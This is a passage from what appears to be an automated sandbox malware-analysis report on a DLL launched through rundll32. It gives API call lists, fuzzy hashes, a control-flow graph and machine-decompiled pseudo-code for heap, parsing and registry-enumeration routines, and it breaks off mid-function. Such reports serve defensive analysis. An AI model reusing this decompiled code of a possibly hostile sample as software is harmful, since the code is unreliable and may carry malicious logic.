                  0x180007f83
                  0x180007f93
                  0x180007f95
                  0x180007fb1
                  0x180007fb8
                  0x180007fc2
                  0x180007fca
                  0x180007fd2
                  0x180007fd7
                  0x180007fee

                  APIs
                    • Part of subcall function 0000000180001CB0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001CF3
                    • Part of subcall function 0000000180001CB0: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001D1C
                    • Part of subcall function 0000000180001CB0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001D77
                  • HeapFree.KERNEL32 ref: 0000000180007ECD
                  • GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180007F6D
                  • HeapFree.KERNEL32 ref: 0000000180007FC2
                  • HeapFree.KERNEL32 ref: 0000000180007FF7
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Free$CriticalSectionTime$AllocEnterFileLeaveSystem
                  • String ID:
                  • API String ID: 2852518528-0
                  • Opcode ID: a3f4ae1a574dbd83885b4e74feebd01faf6c5af6d887b4e50d5c00d782bfa35d
                  • Instruction ID: c83ac7b05f0747d7815e629ee238b773506a9670dbf62c2a3b753bc37d6ce7c8
                  • Opcode Fuzzy Hash: a3f4ae1a574dbd83885b4e74feebd01faf6c5af6d887b4e50d5c00d782bfa35d
                  • Instruction Fuzzy Hash: 09619D3270478986E7A6DF26E4447EA73A5F7987C4F408025FE8947755DF38CA59CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CloseEventFreeHandleHeapSleep
                  • String ID:
                  • API String ID: 1881548302-0
                  • Opcode ID: 7a87654e1c1d56ead822fbb48c45adb1089b141f8d5014ca0f7a12000a4caef3
                  • Instruction ID: 230f4233468542b45992d4c356fbdc30eed23d9d8894d230ebd5e64d76f07138
                  • Opcode Fuzzy Hash: 7a87654e1c1d56ead822fbb48c45adb1089b141f8d5014ca0f7a12000a4caef3
                  • Instruction Fuzzy Hash: EE011E31301A4886FEDACF52E9507AA7361FB4CFC2F489025FE5A83754EF28DA588710
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 68%
                  			E0000000118000137C(signed int __esi, long long __rbx, long long __rcx, intOrPtr* __rdx, void* __r10) {
                  				void* __rbp;
                  				intOrPtr _t29;
                  				void* _t32;
                  				void* _t38;
                  				void* _t42;
                  				void* _t54;
                  				void* _t55;
                  				intOrPtr _t56;
                  				void* _t60;
                  				void* _t61;
                  				void* _t65;
                  				signed int _t73;
                  				void* _t105;
                  				void* _t113;
                  				intOrPtr _t126;
                  				long long _t130;
                  				char* _t133;
                  				intOrPtr* _t140;
                  				long _t143;
                  				long _t145;
                  				void* _t148;
                  				void* _t150;
                  				void* _t151;
                  				intOrPtr* _t155;
                  				char* _t162;
                  				void* _t164;
                  				void* _t171;
                  				long _t173;
                  				int _t176;
                  				void* _t180;
                  				void* _t182;
                  
                  				_t164 = __r10;
                  				_t140 = __rdx;
                  				_t130 = __rcx;
                  				 *((long long*)(_t150 + 0x10)) = __rbx;
                  				 *((long long*)(_t150 + 8)) = __rcx;
                  				_t151 = _t150 - 0x60;
                  				_t126 =  *0x8000d4a0;
                  				r14d = r8d;
                  				if (r8d == 0) goto 0x8000160a;
                  				_t73 = __esi | 0xffffffff;
                  				r11d = 0;
                  				r10d = 0;
                  				_t29 =  *__rdx;
                  				if (_t29 == 0xd) goto 0x80001419;
                  				if (_t29 == 0xa) goto 0x80001419;
                  				if (0 != 0) goto 0x800013ef;
                  				if (_t29 == 0x20) goto 0x800013f1;
                  				if (_t29 == 9) goto 0x800013f1;
                  				goto 0x800013f1;
                  				if (_t29 != 0x3b) goto 0x800013fd;
                  				if (r11d != 0) goto 0x8000141d;
                  				r11d = 1;
                  				if (_t29 != 0x3d) goto 0x80001407;
                  				if (0 != 0) goto 0x8000141d;
                  				if (_t29 != 0x7c) goto 0x8000141d;
                  				if (r10d != 0) goto 0x8000141d;
                  				if (1 != 0) goto 0x8000141d;
                  				r10d = 1;
                  				goto 0x8000141d;
                  				if (1 != 0) goto 0x80001424;
                  				if (1 != 0) goto 0x800013ce;
                  				if (__rdx == _t143) goto 0x8000160a;
                  				r13d = r13d - r8d;
                  				r13d = r13d - 1;
                  				r14d = r14d + r13d;
                  				r13d = 1;
                  				if (r11d == 1) goto 0x800015fb;
                  				if (1 == 0) goto 0x80001459;
                  				r12d = 1;
                  				_t5 = _t140 - 1; // -1
                  				_t54 = _t5;
                  				goto 0x8000145c;
                  				_t173 = _t143;
                  				if (_t54 == 0) goto 0x80001605;
                  				if (r10d == 0) goto 0x800014db;
                  				_t6 = _t164 - 1; // -1
                  				_t60 = _t6;
                  				if (_t60 == 0) goto 0x800014db;
                  				_t31 =  <  ? _t60 : 0x10;
                  				if (0x10 == 0) goto 0x800014ab;
                  				r9b =  *__rdx;
                  				if (r9b == dil) goto 0x800014ab;
                  				if (r9b == 0x20) goto 0x800014ab;
                  				_t105 = r9b - 9;
                  				if (_t105 == 0) goto 0x800014ab;
                  				 *((intOrPtr*)(_t151 + 0x30 - __rdx + __rdx)) = r9b;
                  				if (_t105 != 0) goto 0x8000148c;
                  				_t61 = _t60 + 1;
                  				_t32 = ( <  ? _t60 : 0x10) - 0x10 + _t73;
                  				 *((intOrPtr*)(_t151 + _t126 + 0x30)) = dil;
                  				_t162 = _t61 + __rdx;
                  				if ( *_t162 == 0x20) goto 0x800014c6;
                  				if ( *_t162 != 9) goto 0x800014cd;
                  				goto 0x800014ba;
                  				r9b =  *((intOrPtr*)(_t151 + 0x30));
                  				_t155 = __rdx + _t126;
                  				_t55 = _t54 - _t61 + 1;
                  				goto 0x800014e3;
                  				r9b = dil;
                  				 *((intOrPtr*)(_t151 + 0x30)) = dil;
                  				_t64 =  <  ? _t55 : 0x10;
                  				r11d = 0x10;
                  				if (0x10 == 0) goto 0x80001524;
                  				_t56 =  *_t155;
                  				if (_t56 == dil) goto 0x80001524;
                  				if (_t56 == 0x20) goto 0x80001524;
                  				if (_t56 == 9) goto 0x80001524;
                  				_t14 = _t130 - 0x61; // -96
                  				_t113 = _t14 - 0x19;
                  				if (_t113 > 0) goto 0x80001518;
                  				 *((char*)(_t151 + 0x48 - _t155 + _t155)) = _t56 + 0xe0;
                  				r11d = r11d + _t73;
                  				if (_t113 != 0) goto 0x800014fc;
                  				_t65 = ( <  ? _t55 : 0x10) - r11d;
                  				 *((intOrPtr*)(_t151 + __rdx + 0x48)) = dil;
                  				if (r9b != dil) goto 0x80001546;
                  				r8d = 0x10;
                  				memcpy(_t182, _t180, _t176);
                  				if (_t173 == _t143) goto 0x80001591;
                  				if (1 <= 0) goto 0x80001568;
                  				if ( *_t173 == 0x20) goto 0x8000155f;
                  				if ( *_t173 != 9) goto 0x80001568;
                  				if (1 - 1 < 0) goto 0x80001551;
                  				if (1 == 1) goto 0x80001593;
                  				_t38 = _t148 - 1;
                  				if (_t38 <= 0) goto 0x8000158c;
                  				_t133 = _t38 + _t173 + 1;
                  				if ( *_t133 == 0x20) goto 0x80001583;
                  				if ( *_t133 != 9) goto 0x8000158c;
                  				if (_t38 + _t73 > 0) goto 0x80001579;
                  				goto 0x80001593;
                  				_t22 = _t148 + 1; // 0x1
                  				r8d = _t22;
                  				HeapAlloc(_t171, _t143, _t145);
                  				if (_t126 == _t143) goto 0x800015f8;
                  				r8d = 0;
                  				memcpy(_t148, ??);
                  				 *((intOrPtr*)(__rbx + _t126)) = dil;
                  				_t42 = E00000001180008C48(0xffffffff, _t151 + 0x48);
                  				r9d = 0;
                  				 *((long long*)(_t151 + 0x20)) = _t151 + 0x30;
                  				E00000001180005748(_t56 + 0xe0, _t42, __rbx,  *((intOrPtr*)(_t151 + 0xa0)), _t173 + 1, _t126);
                  				HeapFree(??, ??, ??);
                  				if (r14d == 0) goto 0x8000160a;
                  				goto 0x800013bb;
                  				return 0xb;
                  			}


































                  0x18000137c
                  0x18000137c
                  0x18000137c
                  0x18000137c
                  0x180001381
                  0x180001391
                  0x180001395
                  0x18000139e
                  0x1800013ab
                  0x1800013b8
                  0x1800013c8
                  0x1800013cb
                  0x1800013ce
                  0x1800013d3
                  0x1800013d7
                  0x1800013db
                  0x1800013df
                  0x1800013e3
                  0x1800013ed
                  0x1800013f3
                  0x1800013f8
                  0x1800013fa
                  0x1800013ff
                  0x180001403
                  0x180001409
                  0x18000140e
                  0x180001412
                  0x180001414
                  0x180001417
                  0x18000141b
                  0x180001422
                  0x180001427
                  0x18000142d
                  0x180001430
                  0x180001433
                  0x180001436
                  0x180001440
                  0x180001448
                  0x18000144c
                  0x18000144f
                  0x18000144f
                  0x180001457
                  0x180001459
                  0x18000145e
                  0x180001467
                  0x180001469
                  0x180001469
                  0x18000146f
                  0x18000147b
                  0x180001482
                  0x18000148c
                  0x180001492
                  0x180001498
                  0x18000149a
                  0x18000149e
                  0x1800014a0
                  0x1800014a9
                  0x1800014ab
                  0x1800014ad
                  0x1800014b2
                  0x1800014b7
                  0x1800014be
                  0x1800014c4
                  0x1800014cb
                  0x1800014cd
                  0x1800014d4
                  0x1800014d7
                  0x1800014d9
                  0x1800014db
                  0x1800014de
                  0x1800014ea
                  0x1800014ed
                  0x1800014f2
                  0x1800014fc
                  0x180001502
                  0x180001507
                  0x18000150c
                  0x18000150e
                  0x180001511
                  0x180001513
                  0x180001518
                  0x18000151f
                  0x180001522
                  0x180001524
                  0x180001527
                  0x18000152f
                  0x18000153b
                  0x180001541
                  0x180001549
                  0x18000154f
                  0x180001556
                  0x18000155d
                  0x180001566
                  0x18000156a
                  0x18000156c
                  0x180001574
                  0x180001576
                  0x18000157c
                  0x180001581
                  0x18000158a
                  0x18000158f
                  0x180001593
                  0x180001593
                  0x18000159c
                  0x1800015a8
                  0x1800015aa
                  0x1800015b5
                  0x1800015c2
                  0x1800015c6
                  0x1800015d3
                  0x1800015e0
                  0x1800015e5
                  0x1800015f2
                  0x1800015fe
                  0x180001600
                  0x180001623

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heapmemcpy$AllocFree
                  • String ID:
                  • API String ID: 1496448200-0
                  • Opcode ID: cdd274b2a0972057d5d3fa9f9dc430bb16684e370421a2ed3793fff496384978
                  • Instruction ID: 12f6b3511e6ab994a39ab68529ae422f0e798305e72f5bbead824a43ac2e6bc8
                  • Opcode Fuzzy Hash: cdd274b2a0972057d5d3fa9f9dc430bb16684e370421a2ed3793fff496384978
                  • Instruction Fuzzy Hash: AE811331704A8CCDFBF7C52998443E97AC2A3DD7C2FA9C121F982076D5ED648B8A8301
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 25%
                  			E00000001180001208(long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, long long* __r9, char _a8, long long _a16, long long _a24, long long _a32, intOrPtr* _a40) {
                  				char _v48;
                  				long long _v56;
                  				long long _t43;
                  				long long _t57;
                  				long long _t58;
                  				void* _t68;
                  				long long* _t73;
                  				void* _t75;
                  
                  				_t56 = __rdx;
                  				_a16 = __rbx;
                  				_a24 = __rbp;
                  				_a32 = __rsi;
                  				_t43 =  *0x8000d4a0;
                  				r12d = r8d;
                  				_t75 = __rdx;
                  				if (__rdx == _t57) goto 0x80001304;
                  				if (r8d == 0) goto 0x80001304;
                  				EnterCriticalSection(??);
                  				asm("lock add dword [esi+0x40], 0x1");
                  				LeaveCriticalSection(??);
                  				_t7 =  &_a8; // -110
                  				r8d = 0;
                  				_v48 = 0;
                  				_a8 = 0;
                  				_v56 = _t57;
                  				if (E00000001180009994(r12d, __rdx, __rdx, _t68, _t7) != 0x7a) goto 0x800012fd;
                  				r8d = _a8;
                  				HeapAlloc(??, ??, ??);
                  				_t58 = _t43;
                  				if (_t43 == 0) goto 0x800012f8;
                  				_v48 = 0x10;
                  				_t14 =  &_a8; // -110
                  				_t73 = _t14;
                  				_v56 = __rcx + 0x72;
                  				if (E00000001180009994(r12d, _t75, _t56, _t43, _t73) != 0) goto 0x800012e8;
                  				 *__r9 = _t58;
                  				 *_a40 = _a8;
                  				goto 0x800012fd;
                  				HeapFree(??, ??, ??);
                  				goto 0x800012fd;
                  				asm("lock add dword [esi+0x40], 0xffffffff");
                  				goto 0x80001313;
                  				 *_t73 = _t58;
                  				 *_a40 = 0;
                  				return 0;
                  			}











                  0x180001208
                  0x180001208
                  0x18000120d
                  0x180001212
                  0x180001224
                  0x180001237
                  0x18000123a
                  0x180001243
                  0x18000124c
                  0x180001256
                  0x18000125c
                  0x180001265
                  0x18000126b
                  0x180001270
                  0x180001279
                  0x18000127d
                  0x180001281
                  0x180001290
                  0x180001292
                  0x18000129c
                  0x1800012a2
                  0x1800012a8
                  0x1800012ae
                  0x1800012b6
                  0x1800012b6
                  0x1800012bb
                  0x1800012d2
                  0x1800012e0
                  0x1800012e4
                  0x1800012e6
                  0x1800012f0
                  0x1800012f6
                  0x1800012fd
                  0x180001302
                  0x18000130c
                  0x180001311
                  0x180001331

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CriticalHeapSection$AllocEnterFreeLeave
                  • String ID:
                  • API String ID: 2939682908-0
                  • Opcode ID: 0aae2bb15498bfce2a9550a8a73fe09b0bb207132fae4a23ee3c1e61430e7fbe
                  • Instruction ID: a0890feeee0316dd0af96136dbcc6cf79a7537e396d31e91aa434a41704444e3
                  • Opcode Fuzzy Hash: 0aae2bb15498bfce2a9550a8a73fe09b0bb207132fae4a23ee3c1e61430e7fbe
                  • Instruction Fuzzy Hash: 6D314232204B88C7D761CB5AE84439AF7A4F79CBD4F548115EE9983B64DF38C64ACB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 27%
                  			E000000011800081F0(void* __edx, long long __rbx, signed short* __rcx, long long __rsi, signed int** __r8, intOrPtr* __r9, void* __r11) {
                  				signed int _t21;
                  				signed int _t28;
                  				signed int* _t38;
                  				int _t53;
                  				long long _t58;
                  				void* _t61;
                  				void* _t72;
                  				signed int* _t73;
                  				long _t75;
                  				long _t78;
                  				void* _t81;
                  
                  				 *((long long*)(_t61 + 8)) = __rbx;
                  				 *((long long*)(_t61 + 0x10)) = _t58;
                  				 *((long long*)(_t61 + 0x18)) = __rsi;
                  				_t21 =  *__rcx & 0x0000ffff;
                  				_t38 = __rbx + 4;
                  				r11d = __edx;
                  				r10d = 0x57;
                  				if (__r11 - _t38 <= 0) goto 0x800082e1;
                  				_t28 =  *(__rbx +  &(__rcx[1])) & 0x0000ffff;
                  				if (__r11 -  &(__rcx[2]) < 0) goto 0x800082e1;
                  				if (_t21 == 0) goto 0x800082e1;
                  				if (_t21 - 0x200 > 0) goto 0x800082e1;
                  				if (_t28 == 0) goto 0x800082e1;
                  				if (_t28 - 0x200 > 0) goto 0x800082e1;
                  				r15d = 0x404;
                  				HeapAlloc(_t81, _t78, _t75);
                  				_t73 = _t38;
                  				if (_t38 == 0) goto 0x800082db;
                  				memset(_t72, _t53);
                  				 *_t73 = (_t21 & 0x0000fff0) << 3;
                  				memcpy(??, ??, ??);
                  				memcpy(??, ??, ??);
                  				 *__r8 = _t73;
                  				 *__r9 = r15d;
                  				r10d = 0;
                  				goto 0x800082e1;
                  				r10d = 8;
                  				return r10d;
                  			}














                  0x1800081f0
                  0x1800081f5
                  0x1800081fa
                  0x180008213
                  0x18000821d
                  0x180008221
                  0x18000822a
                  0x180008236
                  0x18000823c
                  0x18000824b
                  0x180008253
                  0x180008260
                  0x180008264
                  0x180008268
                  0x18000826a
                  0x180008278
                  0x18000827e
                  0x180008284
                  0x18000828e
                  0x1800082b0
                  0x1800082b4
                  0x1800082ca
                  0x1800082cf
                  0x1800082d2
                  0x1800082d6
                  0x1800082d9
                  0x1800082db
                  0x180008300

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: memcpy$AllocHeapmemset
                  • String ID:
                  • API String ID: 609429373-0
                  • Opcode ID: c4fa16f6dc2f2ba848d15b560345700d108723914946eadfda53ccda28d560ab
                  • Instruction ID: 28a7b8e95bc2ced4d8e1beef03e6e9b8fa3c41881149a4efc87acd56f6b93b28
                  • Opcode Fuzzy Hash: c4fa16f6dc2f2ba848d15b560345700d108723914946eadfda53ccda28d560ab
                  • Instruction Fuzzy Hash: AA21E072204B9881EB95CF57E84039A7690FB89FC4F04C425FE8A17355EE38C759C308
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: memcpy$AllocHeaplstrlen
                  • String ID:
                  • API String ID: 2888080719-0
                  • Opcode ID: f13b7d7e3ec6c9150a795e7257fff4343ad218865bc8e256d013ad43eeebd2c8
                  • Instruction ID: d7cda782a7b16298d0386595c53ef50d9ac6af49b43f80025cb93dadd90a3a02
                  • Opcode Fuzzy Hash: f13b7d7e3ec6c9150a795e7257fff4343ad218865bc8e256d013ad43eeebd2c8
                  • Instruction Fuzzy Hash: 83219E72300B9891DB56DF17A9813E9B3A1F78CBD4F498521AE490B799DE38C68AC300
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • HeapAlloc.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CA7
                  • memset.NTDLL(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CC1
                    • Part of subcall function 0000000180002464: LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476
                  • HeapAlloc.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CED
                  • InitializeCriticalSection.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008D3E
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: AllocHeap$CriticalInitializeLibraryLoadSectionmemset
                  • String ID:
                  • API String ID: 2387776105-0
                  • Opcode ID: 231236229b59fafa602483bc217cbeaa5c95870d5847978078aa8a3bfdab2cdc
                  • Instruction ID: 4870de9647b4eba85a0def977afe88a726f62592237ec59ed4fc2a31fcf765aa
                  • Opcode Fuzzy Hash: 231236229b59fafa602483bc217cbeaa5c95870d5847978078aa8a3bfdab2cdc
                  • Instruction Fuzzy Hash: 80315036200B5896EB56CF12E8143DA77A5F79CBD4F888126EE8D83795EF38D609C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: FreeHeap$ErrorLast
                  • String ID:
                  • API String ID: 2332451156-0
                  • Opcode ID: a786c878c7dbed4c8c276b5234abe64ea54608898cee96c33fecb54f0875128f
                  • Instruction ID: 57d54ecd6ba6b12e4082159e9fbcbac62f64b62c5c275490acec5f9711af8689
                  • Opcode Fuzzy Hash: a786c878c7dbed4c8c276b5234abe64ea54608898cee96c33fecb54f0875128f
                  • Instruction Fuzzy Hash: D5215E72200B8882EB97DB63D5413A973A5EB8DFC4F589115EE4D93799DF38CA89C300
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CriticalSection$AllocEnterHeapLeavememcpy
                  • String ID:
                  • API String ID: 224082080-0
                  • Opcode ID: fae9b1d28c530db2aae286d3ecdb8edc3b69d7174c662bcadd6a252e0811932a
                  • Instruction ID: 6c58b3867655a66680f731ed639b6ca29fd0989e7b58f2a4007a8aeeb493b1ec
                  • Opcode Fuzzy Hash: fae9b1d28c530db2aae286d3ecdb8edc3b69d7174c662bcadd6a252e0811932a
                  • Instruction Fuzzy Hash: 20112672604B5886E751CF02F888B9AB774F398BD5F958012EA9D43B54DF38C68AC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: AllocHeaplstrlenmemcpymemset
                  • String ID:
                  • API String ID: 422472530-0
                  • Opcode ID: 6855a2b0dbb2b49a0b21a1d0e345b578770580c558caf0e88c3664cb39e6b085
                  • Instruction ID: bc1187ca6e9429620bd200782e7290a68718eb3a581ccfc4400d3cdfedcb2126
                  • Opcode Fuzzy Hash: 6855a2b0dbb2b49a0b21a1d0e345b578770580c558caf0e88c3664cb39e6b085
                  • Instruction Fuzzy Hash: 49014832214B8886EB45DF26A84039977A2F78CFC0F498121EE5943B15DF38E655C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 18000508c-1800050da HeapAlloc 1 180005419 0->1 2 1800050e0-180005112 memset InitializeCriticalSection call 180008b44 0->2 3 18000541e-18000543a 1->3 6 180005118-180005131 call 180007678 call 18000459c 2->6 7 18000540f-180005417 call 180005578 2->7 14 180005133-180005142 6->14 15 180005144 6->15 7->3 16 180005147-18000514e 14->16 15->16 18 18000515b-180005184 HeapAlloc 16->18 19 180005150-180005156 GetLastError 16->19 21 180005226 18->21 22 18000518a-1800051b0 RegOpenKeyW 18->22 20 180005408-18000540d 19->20 20->3 20->7 23 18000522b-18000522e 21->23 24 1800051b2-1800051b4 22->24 25 180005216-180005224 HeapFree 22->25 23->7 26 180005234-180005280 memcpy call 180005ca4 23->26 27 1800051cf-1800051ec RegEnumKeyW 24->27 25->23 35 180005282-18000529a call 180005ca4 26->35 36 18000529c-18000529f 26->36 28 1800051b6-1800051ca call 180009110 27->28 29 1800051ee-1800051f7 27->29 28->29 40 1800051cc 28->40 31 180005203-180005214 RegCloseKey 29->31 32 1800051f9-180005200 29->32 31->25 31->26 32->31 35->36 36->7 39 1800052a5-1800052b6 call 180006dcc 36->39 44 1800052e2-1800052e5 39->44 45 1800052b8-1800052cc call 180003c24 39->45 40->27 44->7 47 1800052eb-1800052ee call 180008708 44->47 45->44 50 1800052ce-1800052de call 180003c24 45->50 51 1800052f3-1800052f6 47->51 50->44 53 180005302-180005323 51->53 54 1800052f8-1800052fd 51->54 56 180005325-18000532d 53->56 57 180005339 53->57 54->7 58 18000533c-18000533f 56->58 59 18000532f-180005337 call 180004ed8 56->59 57->58 60 180005341-180005346 58->60 61 18000534b-180005355 58->61 59->58 60->7 64 180005357-18000535f 61->64 65 18000536e 61->65 66 180005371-180005374 64->66 67 180005361-18000536c call 180004ed8 64->67 65->66 66->60 69 180005376-180005391 GetModuleHandleA 66->69 67->66 71 180005393-1800053a7 call 18000459c 69->71 72 1800053fb-180005403 call 180002b60 69->72 76 1800053a9-1800053bc GetCurrentThreadId 71->76 77 1800053be 71->77 72->20 78 1800053c1-1800053c4 76->78 77->78 78->19 80 1800053ca-1800053db call 18000459c 78->80 83 1800053dd-1800053ec 80->83 84 1800053ee 80->84 85 1800053f1-1800053f4 83->85 84->85 85->3 87 1800053f6 85->87 87->19
                  C-Code - Quality: 50%
                  			E0000000118000508C(void* __ecx, void* __esi, long long __rax, long long __rbx, long long __rcx, void* __r9) {
                  				void* __rdi;
                  				void* __rsi;
                  				void* __rbp;
                  				long _t55;
                  				long _t57;
                  				void* _t65;
                  				void* _t114;
                  				void* _t115;
                  				long long* _t146;
                  				void* _t147;
                  				void* _t153;
                  				int _t188;
                  				long long _t189;
                  				int _t191;
                  				long long _t192;
                  				struct _CRITICAL_SECTION* _t198;
                  				void* _t201;
                  				void* _t202;
                  				signed short* _t211;
                  				void* _t214;
                  				void* _t215;
                  				long long _t216;
                  				void* _t217;
                  				long _t219;
                  				long _t223;
                  				void* _t225;
                  
                  				_t154 = __rbx;
                  				_t146 = __rax;
                  				_t115 = __esi;
                  				 *((long long*)(_t201 + 0x20)) = __rbx;
                  				 *((long long*)(_t201 + 8)) = __rcx;
                  				_t202 = _t201 - 0x230;
                  				_t199 =  *0x8000d4a0;
                  				r14d =  *0x8000d498;
                  				HeapAlloc(_t225, _t223, _t219);
                  				r12d = 0;
                  				_t189 = __rax;
                  				if (__rax == _t217) goto 0x80005419;
                  				memset(_t217, _t188, _t191);
                  				InitializeCriticalSection(_t198);
                  				_t5 = _t189 + 0x98; // 0x98
                  				_t216 = _t5;
                  				 *_t216 = _t216;
                  				 *((long long*)(__rax + 0xa0)) = _t216;
